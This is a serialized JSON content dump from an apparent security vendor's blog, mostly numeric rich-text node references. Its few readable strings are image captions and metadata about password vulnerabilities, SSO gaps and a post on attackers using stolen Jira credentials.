Type":178,"data":136284,"content":136285},{},[136286],{"nodeType":173,"value":111428,"marks":136287,"data":136288},[],{},{"nodeType":235,"data":136290,"content":136291},{},[136292],{"nodeType":173,"value":111435,"marks":136293,"data":136295},[136294],{"type":370},{},{"nodeType":178,"data":136297,"content":136298},{},[136299],{"nodeType":173,"value":111443,"marks":136300,"data":136301},[],{},{"nodeType":250,"data":136303,"content":136304},{},[136305,136328,136351],{"nodeType":254,"data":136306,"content":136307},{},[136308],{"nodeType":178,"data":136309,"content":136310},{},[136311,136315,136318,136325],{"nodeType":173,"value":111456,"marks":136312,"data":136314},[136313],{"type":370},{},{"nodeType":173,"value":111461,"marks":136316,"data":136317},[],{},{"nodeType":186,"data":136319,"content":136320},{"uri":4492},[136321],{"nodeType":173,"value":111468,"marks":136322,"data":136324},[136323],{"type":194},{},{"nodeType":173,"value":111473,"marks":136326,"data":136327},[],{},{"nodeType":254,"data":136329,"content":136330},{},[136331],{"nodeType":178,"data":136332,"content":136333},{},[136334,136338,136341,136348],{"nodeType":173,"value":111483,"marks":136335,"data":136337},[136336],{"type":370},{},{"nodeType":173,"value":111488,"marks":136339,"data":136340},[],{},{"nodeType":186,"data":136342,"content":136343},{"uri":832},[136344],{"nodeType":173,"value":835,"marks":136345,"data":136347},[136346],{"type":194},{},{"nodeType":173,"value":111499,"marks":136349,"data":136350},[],{},{"nodeType":254,"data":136352,"content":136353},{},[136354],{"nodeType":178,"data":136355,"content":136356},{},[136357,136361],{"nodeType":173,"value":111509,"marks":136358,"data":136360},[136359],{"type":370},{},{"nodeType":173,"value":111514,"marks":136362,"data":136363},[],{},{"nodeType":178,"data":136365,"content":136366},{},[136367,136371],{"nodeType":173,"value":111521,"marks":136368,"data":136370},[136369],{"type":370},{},{"nodeType":173,"value":111526,"marks":136372,"data":136373},[],{},{"nodeType":178,"data":136375,"content":136376},{},[136377],{"nodeType":173,"value":111533,"marks":136378,"data":136379},[],{},{"nodeType":235,"data":136381,"content":136382},{},[136383],{"nodeType":173,"value":111540,"marks":136384,"data":136386},[136385],{"type":370},{},{"nodeType":178,"data":136388,"content":136389},{},[136390],{"nodeType":173,"value":111548,"marks":136391,"data":136392},[],{},{"nodeType":250,"data":136394,"content":136395},{},[136396,136420],{"nodeType":254,"data":136397,"content":136398},{},[136399],{"nodeType":178,"data":136400,"content":136401},{},[136402,136405,136413,136417],{"nodeType":173,"value":37,"marks":136403,"data":136404},[],{},{"nodeType":186,"data":136406,"content":136407},{"uri":111565},[136408],{"nodeType":173,"value":111568,"marks":136409,"data":136412},[136410,136411],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":136414,"data":136416},[136415],{"type":370},{},{"nodeType":173,"value":111578,"marks":136418,"data":136419},[],{},{"nodeType":254,"data":136421,"content":136422},{},[136423],{"nodeType":178,"data":136424,"content":136425},{},[136426,136430,136433,136440],{"nodeType":173,"value":111588,"marks":136427,"data":136429},[136428],{"type":370},{},{"nodeType":173,"value":111593,"marks":136431,"data":136432},[],{},{"nodeType":186,"data":136434,"content":136435},{"uri":27492},[136436],{"nodeType":173,"value":4475,"marks":136437,"data":136439},[136438],{"type":194},{},{"nodeType":173,"value":111604,"marks":136441,"data":136442},[],{},{"nodeType":178,"data":136444,"content":136445},{},[136446,136450],{"nodeType":173,"value":111611,"marks":136447,"data":136449},[136448],{"type":370},{},{"nodeType":173,"value":111616,"marks":136451,"data":136452},[],{},{"nodeType":178,"data":136454,"content":136455},{},[136456],{"nodeType":173,"value":111623,"marks":136457,"data":136458},[],{},{"nodeType":312,"data":136460,"content":136463},{"target":136461},{"sys":136462},{"id":71430,"type":317,"linkType":318},[],{"nodeType":235,"data":136465,"content":136466},{},[136467],{"nodeType":173,"value":111635,"marks":136468,"data":136470},[136469],{"type":370},{},{"nodeType":178,"data":136472,"content":136473},{},[136474],{"nodeType":173,"value":111643,"marks":136475,"data":136476},[],{},{"nodeType":250,"data":136478,"content":136479},{},[136480,136493],{"nodeType":254,"data":136481,"content":136482},{},[136483],{"nodeType":178,"data":136484,"content":136485},{},[136486,136490],{"nodeType":173,"value":111656,"marks":136487,"data":136489},[136488],{"type":370},{},{"nodeType":173,"value":111661,"marks":136491,"data":136492},[],{},{"nodeType":254,"data":136494,"content":136495},{},[136496],{"nodeType":178,"data":136497,"content":136498},{},[136499,136503],{"nodeType":173,"value":111671,"marks":136500,"data":136502},[136501],{"type":370},{},{"nodeType":173,"value":111676,"marks":136504,"data":136505},[],{},{"nodeType":178,"data":136507,"content":136508},{},[136509,136513,136516,136523],{"nodeType":173,"value":111611,"marks":136510,"data":136512},[136511],{"type":370},{},{"nodeType":173,"value":111687,"marks":136514,"data":136515},[],{},{"nodeType":186,"data":136517,"content":136518},{"uri":77262},[136519],{"nodeType":173,"value":111694,"marks":136520,"data":136522},[136521],{"type":194},{},{"nodeType":173,"value":111699,"marks":136524,"data":136525},[],{},{"nodeType":178,"data":136527,"content":136528},{},[136529],{"nodeType":173,"value":111706,"marks":136530,"data":136531},[],{},{"nodeType":3769,"data":136533,"content":136534},{},[136535],{"nodeType":178,"data":136536,"content":136537},{},[136538],{"nodeType":173,"value":111716,"marks":136539,"data":136540},[],{},{"nodeType":231,"data":136542,"content":136543},{},[],{"nodeType":169,"data":136545,"content":136546},{},[136547],{"nodeType":173,"value":111726,"marks":136548,"data":136549},[],{},{"nodeType":178,"data":136551,"content":136552},{},[136553,136556,136563],{"nodeType":173,"value":111733,"marks":136554,"data":136555},[],{},{"nodeType":186,"data":136557,"content":136558},{"uri":81621},[136559],{"nodeType":173,"value":111740,"marks":136560,"data":136562},[136561],{"type":194},{},{"nodeType":173,"value":111745,"marks":136564,"data":136565},[],{},{"nodeType":178,"data":136567,"content":136568},{},[136569],{"nodeType":173,"value":111752,"marks":136570,"data":136571},[],{},{"nodeType":250,"data":136573,"content":136574},{},[136575,136584,136593],{"nodeType":254,"data":136576,"content":136577},{},[136578],{"nodeType":178,"data":136579,"content":136580},{},[136581],{"nodeType":173,"value":111765,"marks":136582,"data":136583},[],{},{"nodeType":254,"data":136585,"content":136586},{},[136587],{"nodeType":178,"data":136588,"content":136589},{},[136590],{"nodeType":173,"value":111775,"marks":136591,"data":136592},[],{},{"nodeType":254,"data":136594,"content":136595},{},[136596],{"nodeType":178,"data":136597,"content":136598},{},[136599],{"nodeType":173,"value":111785,"marks":136600,"data":136601},[],{},{"nodeType":178,"data":136603,"content":136604},{},[136605],{"nodeType":173,"value":111792,"marks":136606,"data":136607},[],{},{"nodeType":178,"data":136609,"content":136610},{},[136611],{"nodeType":173,"value":111799,"marks":136612,"data":136613},[],{},{"nodeType":178,"data":136615,"content":136616},{},[136617],{"nodeType":173,"value":111806,"marks":136618,"data":136619},[],{},{"nodeType":312,"data":136621,"content":136624},{"target":136622},{"sys":136623},{"id":111813,"type":317,"linkType":318},[],{"nodeType":231,"data":136626,"content":136627},{},[],{"nodeType":169,"data":136629,"content":136630},{},[136631],{"nodeType":173,"value":111822,"marks":136632,"data":136633},[],{},{"nodeType":178,"data":136635,"content":136636},{},[136637],{"nodeType":173,"value":111829,"marks":136638,"data":136639},[],{},{"nodeType":235,"data":136641,"content":136642},{},[136643],{"nodeType":173,"value":111836,"marks":136644,"data":136646},[136645],{"type":370},{},{"nodeType":178,"data":136648,"content":136649},{},[136650],{"nodeType":173,"value":111844,"marks":136651,"data":136652},[],{},{"nodeType":178,"data":136654,"content":136655},{},[136656],{"nodeType":173,"value":111851,"marks":136657,"data":136658},[],{},{"nodeType":178,"data":136660,"content":136661},{},[136662,136665,136669],{"nodeType":173,"value":111858,"marks":136663,"data":136664},[],{},{"nodeType":173,"value":67363,"marks":136666,"data":136668},[136667],{"type":1646},{},{"nodeType":173,"value":111866,"marks":136670,"data":136671},[],{},{"nodeType":312,"data":136673,"content":136676},{"target":136674},{"sys":136675},{"id":111873,"type":317,"linkType":318},[],{"nodeType":235,"data":136678,"content":136679},{},[136680],{"nodeType":173,"value":111879,"marks":136681,"data":136683},[136682],{"type":370},{},{"nodeType":178,"data":136685,"content":136686},{},[136687],{"nodeType":173,"value":111887,"marks":136688,"data":136689},[],{},{"nodeType":312,"data":136691,"content":136694},{"target":136692},{"sys":136693},{"id":111894,"type":317,"linkType":318},[],{"nodeType":235,"data":136696,"content":136697},{},[136698],{"nodeType":173,"value":111900,"marks":136699,"data":136701},[136700],{"type":370},{},{"nodeType":178,"data":136703,"content":136704},{},[136705,136708,136715],{"nodeType":173,"value":111908,"marks":136706,"data":136707},[],{},{"nodeType":186,"data":136709,"content":136710},{"uri":111913},[136711],{"nodeType":173,"value":111916,"marks":136712,"data":136714},[136713],{"type":194},{},{"nodeType":173,"value":111921,"marks":136716,"data":136717},[],{},{"nodeType":178,"data":136719,"content":136720},{},[136721],{"nodeType":173,"value":111928,"marks":136722,"data":136723},[],{},{"nodeType":178,"data":136725,"content":136726},{},[136727,136730,136737,136740,136747],{"nodeType":173,"value":111935,"marks":136728,"data":136729},[],{},{"nodeType":186,"data":136731,"content":136732},{"uri":111940},[136733],{"nodeType":173,"value":111943,"marks":136734,"data":136736},[136735],{"type":194},{},{"nodeType":173,"value":111948,"marks":136738,"data":136739},[],{},{"nodeType":186,"data":136741,"content":136742},{"uri":111953},[136743],{"nodeType":173,"value":111956,"marks":136744,"data":136746},[136745],{"type":194},{},{"nodeType":173,"value":111961,"marks":136748,"data":136749},[],{},{"nodeType":178,"data":136751,"content":136752},{},[136753,136756,136764],{"nodeType":173,"value":2596,"marks":136754,"data":136755},[],{},{"nodeType":186,"data":136757,"content":136758},{"uri":62639},[136759],{"nodeType":173,"value":111974,"marks":136760,"data":136763},[136761,136762],{"type":194},{"type":370},{},{"nodeType":173,"value":111980,"marks":136765,"data":136766},[],{},{"nodeType":312,"data":136768,"content":136771},{"target":136769},{"sys":136770},{"id":105077,"type":317,"linkType":318},[],{"nodeType":178,"data":136773,"content":136774},{},[136775,136778,136785],{"nodeType":173,"value":111992,"marks":136776,"data":136777},[],{},{"nodeType":186,"data":136779,"content":136780},{"uri":111997},[136781],{"nodeType":173,"value":112000,"marks":136782,"data":136784},[136783],{"type":194},{},{"nodeType":173,"value":112005,"marks":136786,"data":136787},[],{},{"nodeType":178,"data":136789,"content":136790},{},[136791,136794,136801],{"nodeType":173,"value":112012,"marks":136792,"data":136793},[],{},{"nodeType":186,"data":136795,"content":136796},{"uri":112017},[136797],{"nodeType":173,"value":112020,"marks":136798,"data":136800},[136799],{"type":194},{},{"nodeType":173,"value":112025,"marks":136802,"data":136803},[],{},{"nodeType":235,"data":136805,"content":136806},{},[136807],{"nodeType":173,"value":112032,"marks":136808,"data":136810},[136809],{"type":370},{},{"nodeType":178,"data":136812,"content":136813},{},[136814],{"nodeType":173,"value":112040,"marks":136815,"data":136816},[],{},{"nodeType":178,"data":136818,"content":136819},{},[136820],{"nodeType":173,"value":112047,"marks":136821,"data":136822},[],{},{"nodeType":312,"data":136824,"content":136827},{"target":136825},{"sys":136826},{"id":112054,"type":317,"linkType":318},[],{"nodeType":178,"data":136829,"content":136830},{},[136831,136834,136841],{"nodeType":173,"value":112060,"marks":136832,"data":136833},[],{},{"nodeType":186,"data":136835,"content":136836},{"uri":77513},[136837],{"nodeType":173,"value":2570,"marks":136838,"data":136840},[136839],{"type":194},{},{"nodeType":173,"value":112071,"marks":136842,"data":136843},[],{},{"nodeType":231,"data":136845,"content":136846},{},[],{"nodeType":169,"data":136848,"content":136849},{},[136850],{"nodeType":173,"value":112081,"marks":136851,"data":136853},[136852],{"type":370},{},{"nodeType":178,"data":136855,"content":136856},{},[136857,136860,136864],{"nodeType":173,"value":112089,"marks":136858,"data":136859},[],{},{"nodeType":173,"value":3107,"marks":136861,"data":136863},[136862],{"type":370},{},{"nodeType":173,"value":112097,"marks":136865,"data":136866},[],{},{"nodeType":178,"data":136868,"content":136869},{},[136870],{"nodeType":173,"value":112104,"marks":136871,"data":136872},[],{},{"nodeType":178,"data":136874,"content":136875},{},[136876],{"nodeType":173,"value":71740,"marks":136877,"data":136878},[],{},{"nodeType":250,"data":136880,"content":136881},{},[136882,136905,136914],{"nodeType":254,"data":136883,"content":136884},{},[136885],{"nodeType":178,"data":136886,"content":136887},{},[136888,136891,136895,136898,136902],{"nodeType":173,"value":18635,"marks":136889,"data":136890},[],{},{"nodeType":173,"value":2578,"marks":136892,"data":136894},[136893],{"type":370},{},{"nodeType":173,"value":112130,"marks":136896,"data":136897},[],{},{"nodeType":173,"value":18649,"marks":136899,"data":136901},[136900],{"type":370},{},{"nodeType":173,"value":112138,"marks":136903,"data":136904},[],{},{"nodeType":254,"data":136906,"content":136907},{},[136908],{"nodeType":178,"data":136909,"content":136910},{},[136911],{"nodeType":173,"value":112148,"marks":136912,"data":136913},[],{},{"nodeType":254,"data":136915,"content":136916},{},[136917],{"nodeType":178,"data":136918,"content":136919},{},[136920],{"nodeType":173,"value":112158,"marks":136921,"data":136922},[],{},{"nodeType":312,"data":136924,"content":136927},{"target":136925},{"sys":136926},{"id":77578,"type":317,"linkType":318},[],{"nodeType":178,"data":136929,"content":136930},{},[136931],{"nodeType":173,"value":112170,"marks":136932,"data":136933},[],{},{"nodeType":178,"data":136935,"content":136936},{},[136937],{"nodeType":173,"value":112177,"marks":136938,"data":136939},[],{},{"nodeType":250,"data":136941,"content":136942},{},[136943,136952,136961,136970],{"nodeType":254,"data":136944,"content":136945},{},[136946],{"nodeType":178,"data":136947,"content":136948},{},[136949],{"nodeType":173,"value":112190,"marks":136950,"data":136951},[],{},{"nodeType":254,"data":136953,"content":136954},{},[136955],{"nodeType":178,"data":136956,"content":136957},{},[136958],{"nodeType":173,"value":112200,"marks":136959,"data":136960},[],{},{"nodeType":254,"data":136962,"content":136963},{},[136964],{"nodeType":178,"data":136965,"content":136966},{},[136967],{"nodeType":173,"value":112210,"marks":136968,"data":136969},[],{},{"nodeType":254,"data":136971,"content":136972},{},[136973],{"nodeType":178,"data":136974,"content":136975},{},[136976],{"nodeType":173,"value":112220,"marks":136977,"data":136978},[],{},{"nodeType":231,"data":136980,"content":136981},{},[],{"nodeType":169,"data":136983,"content":136984},{},[136985],{"nodeType":173,"value":112230,"marks":136986,"data":136988},[136987],{"type":370},{},{"nodeType":178,"data":136990,"content":136991},{},[136992],{"nodeType":173,"value":112238,"marks":136993,"data":136994},[],{},{"nodeType":231,"data":136996,"content":136997},{},[],{"nodeType":169,"data":136999,"content":137000},{},[137001],{"nodeType":173,"value":71801,"marks":137002,"data":137003},[],{},{"nodeType":178,"data":137005,"content":137006},{},[137007,137010,137017],{"nodeType":173,"value":112254,"marks":137008,"data":137009},[],{},{"nodeType":186,"data":137011,"content":137012},{"uri":473},[137013],{"nodeType":173,"value":2889,"marks":137014,"data":137016},[137015],{"type":194},{},{"nodeType":173,"value":1477,"marks":137018,"data":137019},[],{},{"entries":137021},{"hyperlink":137022,"inline":137023,"block":137024},[],[],[137025,137031,137038,137042,137048,137055,137058,137064],{"sys":137026,"__typename":5345,"title":137027,"caption":137028,"layoutMode":118,"file":137029},{"id":111345},"Password users support group","The weekly passwordless support group meet-up",{"url":137030,"width":134271,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/2Hnrt8xKG7RFyaHupm9ZkU/b630a7bc7bba8b5ad2c05eac57893fba/image__47_.png",{"sys":137032,"__typename":5345,"title":137033,"caption":137034,"layoutMode":118,"file":137035},{"id":71430},"Sankey","How identity vulnerabilities are introduced based on account authentication methods, and how they can be exploited using different attack techniques.",{"url":137036,"width":137037,"height":137037},"https://images.ctfassets.net/y1cdw1ablpvd/55oogXnSqSaDWXvUS0QhES/9e14e2456093c868881578a02d925e29/Sankey_chart_-_Final.png",4320,{"sys":137039,"__typename":5345,"title":137040,"caption":137040,"layoutMode":118,"file":137041},{"id":111813},"The average SaaS attack path involves direct in-app compromise following account takeover",{"url":75588,"width":75589,"height":75590},{"sys":137043,"__typename":5345,"title":137044,"caption":137044,"layoutMode":118,"file":137045},{"id":111873},"Push can find all the apps your employees are accessing, whether or not you know about them.",{"url":137046,"width":137047,"height":46407},"https://images.ctfassets.net/y1cdw1ablpvd/5A4DDagLgRbT0na0zoplPA/27e3bbae558e27090952f97c506e1620/image9.png",1528,{"sys":137049,"__typename":5345,"title":137050,"caption":137050,"layoutMode":118,"file":137051},{"id":111894},"Many apps allow multiple login methods, including local password access, even once the application has been onboarded to SSO.",{"url":137052,"width":137053,"height":137054},"https://images.ctfassets.net/y1cdw1ablpvd/w2X0MdbvfrmPcpPMUbLlC/12d42929f0f58134706ae1da46c82bf7/image3.png",1405,446,{"sys":137056,"__typename":5345,"title":121114,"caption":121115,"layoutMode":118,"file":137057},{"id":105077},{"url":121117,"width":121118,"height":121119},{"sys":137059,"__typename":5345,"title":137060,"caption":137061,"layoutMode":118,"file":137062},{"id":112054},"Password enforcement banner github","Push displays an in-browser splash screen prompting the user to change their insecure password at the point of login to an app",{"url":137063,"width":23880,"height":113559},"https://images.ctfassets.net/y1cdw1ablpvd/3vzYwxGIB9QEyevlCAQhSQ/5e97d859f943610bff21255072ebb982/image10.png",{"sys":137065,"__typename":5434,"title":137066,"arcadeDemoUrl":137067,"playText":5437},{"id":77578},"Arcade: Find and remediate password vulnerabilities in Atlassian","https://demo.arcade.software/O5HwAmXSXboyKZkkO6XS?embed","content:blog:introducing-strong-password-enforcement.json","blog/introducing-strong-password-enforcement.json","blog/introducing-strong-password-enforcement",{"_path":137072,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":137073,"summary":137075,"title":46302,"subtitle":118,"metaTitle":137085,"synopsis":77668,"hashTags":118,"publishedDate":77669,"slug":46303,"ogImage":137086,"tagsCollection":137088,"relatedBlogPostsCollection":137094,"authorsCollection":139248,"content":139252,"_id":139954,"_type":5439,"_source":5440,"_file":139955,"_stem":139956,"_extension":5439},"/blog/why-attackers-are-targeting-jira-with-stolen-credentials",{"id":24631,"publishedAt":137074},"2025-04-28T12:19:15.275Z",{"json":137076},{"data":137077,"content":137078,"nodeType":165},{},[137079],{"data":137080,"content":137081,"nodeType":178},{},[137082],{"data":137083,"marks":137084,"value":77668,"nodeType":173},{},[],"Why attackers are targeting Jira with stolen credentials",{"url":137087},"https://images.ctfassets.net/y1cdw1ablpvd/2IqfH1VLMma3YrbSX29q2Q/0b87ae386387e2ceaed097baf7321257/hellcat_social_graphic.png",{"items":137089},[137090,137092],{"sys":137091,"name":505},{"id":504},{"sys":137093,"name":509},{"id":508},{"items":137095},[137096,137961,138661],{"__typename":1528,"sys":137097,"content":137098,"title":46314,"synopsis":112267,"hashTags":118,"publishedDate":77669,"slug":46315,"tagsCollection":137951,"authorsCollection":137957},{"id":24759},{"json":137099},{"nodeType":165,"data":137100,"content":137101},{},[137102,137118,137124,137130,137136,137142,137147,137153,137166,137169,137175,137181,137187,137193,137202,137208,137214,137220,137227,137233,137295,137305,137311,137318,137324,137374,137384,137390,137395,137402,137408,137437,137457,137463,137472,137475,137481,137497,137503,137533,137539,137545,137551,137556,137559,137565,137571,137578,137584,137590,137603,137608,137615,137621,137626,137633,137649,137655,137681,137698,137703,137719,137735,137742,137748,137754,137759,137775,137778,137785,137798,137804,137810,137854,137859,137865,137871,137910,137913,137920,137926,137929,137935],{"nodeType":178,"data":137103,"content":137104},{},[137105,137108,137115],{"nodeType":173,"value":111298,"marks":137106,"data":137107},[],{},{"nodeType":186,"data":137109,"content":137110},{"uri":111303},[137111],{"nodeType":173,"value":111306,"marks":137112,"data":137114},[137113],{"type":194},{},{"nodeType":173,"value":53584,"marks":137116,"data":137117},[],{},{"nodeType":178,"data":137119,"content":137120},{},[137121],{"nodeType":173,"value":111317,"marks":137122,"data":137123},[],{},{"nodeType":178,"data":137125,"content":137126},{},[137127],{"nodeType":173,"value":111324,"marks":137128,"data":137129},[],{},{"nodeType":178,"data":137131,"content":137132},{},[137133],{"nodeType":173,"value":111331,"marks":137134,"data":137135},[],{},{"nodeType":178,"data":137137,"content":137138},{},[137139],{"nodeType":173,"value":111338,"marks":137140,"data":137141},[],{},{"nodeType":312,"data":137143,"content":137146},{"target":137144},{"sys":137145},{"id":111345,"type":317,"linkType":318},[],{"nodeType":178,"data":137148,"content":137149},{},[137150],{"nodeType":173,"value":111351,"marks":137151,"data":137152},[],{},{"nodeType":178,"data":137154,"content":137155},{},[137156,137159,137163],{"nodeType":173,"value":111358,"marks":137157,"data":137158},[],{},{"nodeType":173,"value":2578,"marks":137160,"data":137162},[137161],{"type":370},{},{"nodeType":173,"value":111366,"marks":137164,"data":137165},[],{},{"nodeType":231,"data":137167,"content":137168},{},[],{"nodeType":169,"data":137170,"content":137171},{},[137172],{"nodeType":173,"value":111376,"marks":137173,"data":137174},[],{},{"nodeType":178,"data":137176,"content":137177},{},[137178],{"nodeType":173,"value":111383,"marks":137179,"data":137180},[],{},{"nodeType":178,"data":137182,"content":137183},{},[137184],{"nodeType":173,"value":111390,"marks":137185,"data":137186},[],{},{"nodeType":178,"data":137188,"content":137189},{},[137190],{"nodeType":173,"value":111397,"marks":137191,"data":137192},[],{},{"nodeType":3769,"data":137194,"content":137195},{},[137196],{"nodeType":178,"data":137197,"content":137198},{},[137199],{"nodeType":173,"value":111407,"marks":137200,"data":137201},[],{},{"nodeType":178,"data":137203,"content":137204},{},[137205],{"nodeType":173,"value":111414,"marks":137206,"data":137207},[],{},{"nodeType":178,"data":137209,"content":137210},{},[137211],{"nodeType":173,"value":111421,"marks":137212,"data":137213},[],{},{"nodeType":178,"data":137215,"content":137216},{},[137217],{"nodeType":173,"value":111428,"marks":137218,"data":137219},[],{},{"nodeType":235,"data":137221,"content":137222},{},[137223],{"nodeType":173,"value":111435,"marks":137224,"data":137226},[137225],{"type":370},{},{"nodeType":178,"data":137228,"content":137229},{},[137230],{"nodeType":173,"value":111443,"marks":137231,"data":137232},[],{},{"nodeType":250,"data":137234,"content":137235},{},[137236,137259,137282],{"nodeType":254,"data":137237,"content":137238},{},[137239],{"nodeType":178,"data":137240,"content":137241},{},[137242,137246,137249,137256],{"nodeType":173,"value":111456,"marks":137243,"data":137245},[137244],{"type":370},{},{"nodeType":173,"value":111461,"marks":137247,"data":137248},[],{},{"nodeType":186,"data":137250,"content":137251},{"uri":4492},[137252],{"nodeType":173,"value":111468,"marks":137253,"data":137255},[137254],{"type":194},{},{"nodeType":173,"value":111473,"marks":137257,"data":137258},[],{},{"nodeType":254,"data":137260,"content":137261},{},[137262],{"nodeType":178,"data":137263,"content":137264},{},[137265,137269,137272,137279],{"nodeType":173,"value":111483,"marks":137266,"data":137268},[137267],{"type":370},{},{"nodeType":173,"value":111488,"marks":137270,"data":137271},[],{},{"nodeType":186,"data":137273,"content":137274},{"uri":832},[137275],{"nodeType":173,"value":835,"marks":137276,"data":137278},[137277],{"type":194},{},{"nodeType":173,"value":111499,"marks":137280,"data":137281},[],{},{"nodeType":254,"data":137283,"content":137284},{},[137285],{"nodeType":178,"data":137286,"content":137287},{},[137288,137292],{"nodeType":173,"value":111509,"marks":137289,"data":137291},[137290],{"type":370},{},{"nodeType":173,"value":111514,"marks":137293,"data":137294},[],{},{"nodeType":178,"data":137296,"content":137297},{},[137298,137302],{"nodeType":173,"value":111521,"marks":137299,"data":137301},[137300],{"type":370},{},{"nodeType":173,"value":111526,"marks":137303,"data":137304},[],{},{"nodeType":178,"data":137306,"content":137307},{},[137308],{"nodeType":173,"value":111533,"marks":137309,"data":137310},[],{},{"nodeType":235,"data":137312,"content":137313},{},[137314],{"nodeType":173,"value":111540,"marks":137315,"data":137317},[137316],{"type":370},{},{"nodeType":178,"data":137319,"content":137320},{},[137321],{"nodeType":173,"value":111548,"marks":137322,"data":137323},[],{},{"nodeType":250,"data":137325,"content":137326},{},[137327,137351],{"nodeType":254,"data":137328,"content":137329},{},[137330],{"nodeType":178,"data":137331,"content":137332},{},[137333,137336,137344,137348],{"nodeType":173,"value":37,"marks":137334,"data":137335},[],{},{"nodeType":186,"data":137337,"content":137338},{"uri":111565},[137339],{"nodeType":173,"value":111568,"marks":137340,"data":137343},[137341,137342],{"type":194},{"type":370},{},{"nodeType":173,"value":3107,"marks":137345,"data":137347},[137346],{"type":370},{},{"nodeType":173,"value":111578,"marks":137349,"data":137350},[],{},{"nodeType":254,"data":137352,"content":137353},{},[137354],{"nodeType":178,"data":137355,"content":137356},{},[137357,137361,137364,137371],{"nodeType":173,"value":111588,"marks":137358,"data":137360},[137359],{"type":370},{},{"nodeType":173,"value":111593,"marks":137362,"data":137363},[],{},{"nodeType":186,"data":137365,"content":137366},{"uri":27492},[137367],{"nodeType":173,"value":4475,"marks":137368,"data":137370},[137369],{"type":194},{},{"nodeType":173,"value":111604,"marks":137372,"data":137373},[],{},{"nodeType":178,"data":137375,"content":137376},{},[137377,137381],{"nodeType":173,"value":111611,"marks":137378,"data":137380},[137379],{"type":370},{},{"nodeType":173,"value":111616,"marks":137382,"data":137383},[],{},{"nodeType":178,"data":137385,"content":137386},{},[137387],{"nodeType":173,"value":111623,"marks":137388,"data":137389},[],{},{"nodeType":312,"data":137391,"content":137394},{"target":137392},{"sys":137393},{"id":71430,"type":317,"linkType":318},[],{"nodeType":235,"data":137396,"content":137397},{},[137398],{"nodeType":173,"value":111635,"marks":137399,"data":137401},[137400],{"type":370},{},{"nodeType":178,"data":137403,"content":137404},{},[137405],{"nodeType":173,"value":111643,"marks":137406,"data":137407},[],{},{"nodeType":250,"data":137409,"content":137410},{},[137411,137424],{"nodeType":254,"data":137412,"content":137413},{},[137414],{"nodeType":178,"data":137415,"content":137416},{},[137417,137421],{"nodeType":173,"value":111656,"marks":137418,"data":137420},[137419],{"type":370},{},{"nodeType":173,"value":111661,"marks":137422,"data":137423},[],{},{"nodeType":254,"data":137425,"content":137426},{},[137427],{"nodeType":178,"data":137428,"content":137429},{},[137430,137434],{"nodeType":173,"value":111671,"marks":137431,"data":137433},[137432],{"type":370},{},{"nodeType":173,"value":111676,"marks":137435,"data":137436},[],{},{"nodeType":178,"data":137438,"content":137439},{},[137440,137444,137447,137454],{"nodeType":173,"value":111611,"marks":137441,"data":137443},[137442],{"type":370},{},{"nodeType":173,"value":111687,"marks":137445,"data":137446},[],{},{"nodeType":186,"data":137448,"content":137449},{"uri":77262},[137450],{"nodeType":173,"value":111694,"marks":137451,"data":137453},[137452],{"type":194},{},{"nodeType":173,"value":111699,"marks":137455,"data":137456},[],{},{"nodeType":178,"data":137458,"content":137459},{},[137460],{"nodeType":173,"value":111706,"marks":137461,"data":137462},[],{},{"nodeType":3769,"data":137464,"content":137465},{},[137466],{"nodeType":178,"data":137467,"content":137468},{},[137469],{"nodeType":173,"value":111716,"marks":137470,"data":137471},[],{},{"nodeType":231,"data":137473,"content":137474},{},[],{"nodeType":169,"data":137476,"content":137477},{},[137478],{"nodeType":173,"value":111726,"marks":137479,"data":137480},[],{},{"nodeType":178,"data":137482,"content":137483},{},[137484,137487,137494],{"nodeType":173,"value":111733,"marks":137485,"data":137486},[],{},{"nodeType":186,"data":137488,"content":137489},{"uri":81621},[137490],{"nodeType":173,"value":111740,"marks":137491,"data":137493},[137492],{"type":194},{},{"nodeType":173,"value":111745,"marks":137495,"data":137496},[],{},{"nodeType":178,"data":137498,"content":137499},{},[137500],{"nodeType":173,"value":111752,"marks":137501,"data":137502},[],{},{"nodeType":250,"data":137504,"content":137505},{},[137506,137515,137524],{"nodeType":254,"data":137507,"content":137508},{},[137509],{"nodeType":178,"data":137510,"content":137511},{},[137512],{"nodeType":173,"value":111765,"marks":137513,"data":137514},[],{},{"nodeType":254,"data":137516,"content":137517},{},[137518],{"nodeType":178,"data":137519,"content":137520},{},[137521],{"nodeType":173,"value":111775,"marks":137522,"data":137523},[],{},{"nodeType":254,"data":137525,"content":137526},{},[137527],{"nodeType":178,"data":137528,"content":137529},{},[137530],{"nodeType":173,"value":111785,"marks":137531,"data":137532},[],{},{"nodeType":178,"data":137534,"content":137535},{},[137536],{"nodeType":173,"value":111792,"marks":137537,"data":137538},[],{},{"nodeType":178,"data":137540,"content":137541},{},[137542],{"nodeType":173,"value":111799,"marks":137543,"data":137544},[],{},{"nodeType":178,"data":137546,"content":137547},{},[137548],{"nodeType":173,"value":111806,"marks":137549,"data":137550},[],{},{"nodeType":312,"data":137552,"content":137555},{"target":137553},{"sys":137554},{"id":111813,"type":317,"linkType":318},[],{"nodeType":231,"data":137557,"content":137558},{},[],{"nodeType":169,"data":137560,"content":137561},{},[137562],{"nodeType":173,"value":111822,"marks":137563,"data":137564},[],{},{"nodeType":178,"data":137566,"content":137567},{},[137568],{"nodeType":173,"value":111829,"marks":137569,"data":137570},[],{},{"nodeType":235,"data":137572,"content":137573},{},[137574],{"nodeType":173,"value":111836,"marks":137575,"data":137577},[137576],{"type":370},{},{"nodeType":178,"data":137579,"content":137580},{},[137581],{"nodeType":173,"value":111844,"marks":137582,"data":137583},[],{},{"nodeType":178,"data":137585,"content":137586},{},[137587],{"nodeType":173,"value":111851,"marks":137588,"data":137589},[],{},{"nodeType":178,"data":137591,"content":137592},{},[137593,137596,137600],{"nodeType":173,"value":111858,"marks":137594,"data":137595},[],{},{"nodeType":173,"value":67363,"marks":137597,"data":137599},[137598],{"type":1646},{},{"nodeType":173,"value":111866,"marks":137601,"data":137602},[],{},{"nodeType":312,"data":137604,"content":137607},{"target":137605},{"sys":137606},{"id":111873,"type":317,"linkType":318},[],{"nodeType":235,"data":137609,"content":137610},{},[137611],{"nodeType":173,"value":111879,"marks":137612,"data":137614},[137613],{"type":370},{},{"nodeType":178,"data":137616,"content":137617},{},[137618],{"nodeType":173,"value":111887,"marks":137619,"data":137620},[],{},{"nodeType":312,"data":137622,"content":137625},{"target":137623},{"sys":137624},{"id":111894,"type":317,"linkType":318},[],{"nodeType":235,"data":137627,